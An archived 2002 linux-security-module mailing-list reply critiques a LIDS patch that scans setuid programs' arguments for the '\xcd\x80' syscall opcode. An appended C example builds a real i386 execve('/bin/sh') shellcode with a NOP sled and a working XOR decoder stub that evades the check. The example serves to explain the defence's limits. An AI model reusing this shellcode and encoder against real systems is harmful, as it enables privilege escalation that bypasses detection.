Re: shellcode detection and prevention in LIDS

From: Valdis.Kletnieksat_private
Date: Thu May 23 2002 - 20:45:27 PDT

  • Next message: Bosko Radivojevic: "Re: [lids-user] shellcode detection and prevention in LIDS"

    On Thu, 23 May 2002 16:20:58 PDT, Huagang Xie said:
    
    > When the parameter/env length is too long, it will print out a message to
    > warn you, and if it finds shellcode at the same time, it will stop the
    > program. This check only applies to setuid/setgid programs. It is a very
    > simple way to check for shellcode; it only checks for the system call assembly
    > code, for example, for I386, it is "\xcd\x80". Now we can support only
    > I386, MIPS, SPARC and PPC. During testing, it has successfully detected and
    > prevented some of the local buffer overflow attacks, like su, xlock. Here is
    > some log example shown on my machine,
    
    First off, let me say this patch (which I have NOT tried) looks like a
    Very Good Thing overall.  However, I see 2 weaknesses offhand:
    
    1) It does not help if the shellcode sled is smaller than your
    SHELLCODE_LENGTH variable (which could easily be the case, for instance,
    if the exploit attacks a 64-byte long buffer - see the xntpd exploit,
    which was an off-by-one on a 128-byte buffer, if I remember right).
    
    2) If the shellcode does an XOR-trick to mask the \xcd\x80, similar to
    the usual techniques for embedding nulls, your code won't stop that either.
    
    But as long as you realize it has limits, it looks good....
    
    -- 
    				Valdis Kletnieks
    				Computer Systems Senior Engineer
    				Virginia Tech

    _______________________________________________ linux-security-module mailing list linux-security-moduleat_private http://mail.wirex.com/mailman/listinfo/linux-security-module
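As an added example (not code from the LIDS patch or from either poster), the following C models the check Huagang describes and the two bypasses Valdis lists. The SHELLCODE_LENGTH value of 128, the function names, the classic 23-byte i386 execve("/bin/sh") shellcode and the jmp/call/pop XOR decoder stub are all assumptions for illustration; the bytes are only scanned as data, never executed.

```c
/* Model of the "\xcd\x80" argv/env scan described in the thread, plus the two
 * weaknesses Valdis points out. Names and the threshold value are assumptions. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SHELLCODE_LENGTH 128      /* assumed value of the patch's threshold */
#define NOP 0x90                  /* i386 nop, used for the sled */

/* Classic 23-byte i386 execve("/bin/sh") shellcode (constructed sample); ends in "int 0x80". */
static const unsigned char SHELLCODE[] = {
    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80 };
#define SHELLCODE_LEN (sizeof SHELLCODE)

/* 1 if the raw i386 syscall opcode "\xcd\x80" appears anywhere in buf. */
int contains_syscall(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (buf[i] == 0xcd && buf[i + 1] == 0x80) return 1;
    return 0;
}

/* The check as described: 0 = too short to inspect, passes silently;
 * 1 = long argument, warning only; 2 = long AND contains the opcode: blocked. */
int lids_style_check(const unsigned char *arg, size_t len)
{
    if (len < SHELLCODE_LENGTH) return 0;
    return contains_syscall(arg, len) ? 2 : 1;
}

/* Weakness 1: NOP sled + raw shellcode, total bytes long. Returns total, or 0 if it does not fit. */
size_t build_raw_payload(size_t total, unsigned char *out, size_t cap)
{
    if (total < SHELLCODE_LEN || total > cap) return 0;
    memset(out, NOP, total - SHELLCODE_LEN);
    memcpy(out + total - SHELLCODE_LEN, SHELLCODE, SHELLCODE_LEN);
    return total;
}

/* Weakness 2: a jmp/call/pop XOR decoder stub (assumed, standard layout) followed by the
 * shellcode XORed with key. The stub itself never contains "\xcd\x80". */
#define STUB_LEN 20
size_t build_xor_payload(unsigned char key, size_t total, unsigned char *out, size_t cap)
{
    const size_t body = STUB_LEN + SHELLCODE_LEN;
    if (total < body || total > cap) return 0;
    unsigned char stub[STUB_LEN] = {
        0xeb,0x0d,                          /* jmp short +13 -> call      */
        0x5e,                               /* pop esi (esi = encoded)    */
        0x31,0xc9,                          /* xor ecx,ecx                */
        0xb1,(unsigned char)SHELLCODE_LEN,  /* mov cl, len                */
        0x80,0x36,key,                      /* xor byte [esi], key        */
        0x46,                               /* inc esi                    */
        0xe2,0xfa,                          /* loop -6                    */
        0xeb,0x05,                          /* jmp short +5 -> shellcode  */
        0xe8,0xee,0xff,0xff,0xff };         /* call -18 -> pop esi        */
    unsigned char *p = out;
    memset(p, NOP, total - body); p += total - body;
    memcpy(p, stub, STUB_LEN);    p += STUB_LEN;
    for (size_t i = 0; i < SHELLCODE_LEN; i++) p[i] = SHELLCODE[i] ^ key;
    return total;
}

/* Pick the smallest key whose payload has neither "\xcd\x80" nor a NUL byte
 * (a NUL would terminate the C string argument). Returns 0 on success. */
int find_xor_key(unsigned char *key_out)
{
    unsigned char tmp[STUB_LEN + SHELLCODE_LEN];
    for (int k = 1; k < 256; k++) {
        size_t n = build_xor_payload((unsigned char)k, sizeof tmp, tmp, sizeof tmp);
        if (contains_syscall(tmp, n) || memchr(tmp, 0, n)) continue;
        *key_out = (unsigned char)k;
        return 0;
    }
    return -1;
}

/* What the stub does at run time: undo the XOR in place. */
void xor_decode(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++) buf[i] ^= key;
}

int main(void)
{
    unsigned char buf[256], key = 0;
    size_t n = build_raw_payload(64, buf, sizeof buf);
    printf("64-byte raw payload: check=%d (opcode present=%d)\n",
           lids_style_check(buf, n), contains_syscall(buf, n));
    n = build_raw_payload(160, buf, sizeof buf);
    printf("160-byte raw payload: check=%d\n", lids_style_check(buf, n));
    if (find_xor_key(&key) == 0) {
        n = build_xor_payload(key, 160, buf, sizeof buf);
        printf("160-byte XOR payload (key 0x%02x): check=%d\n", key, lids_style_check(buf, n));
        xor_decode(buf + n - SHELLCODE_LEN, SHELLCODE_LEN, key);
        printf("same payload after the stub decodes it: check=%d\n", lids_style_check(buf, n));
    }
    return 0;
}
```

The short raw payload carries the opcode but is never inspected, and the long XOR-encoded payload is inspected but carries nothing to match; only after the stub runs does "\xcd\x80" reappear, which is exactly the point that an argv/env scan happens before the code executes.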
    This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:47:00 PDT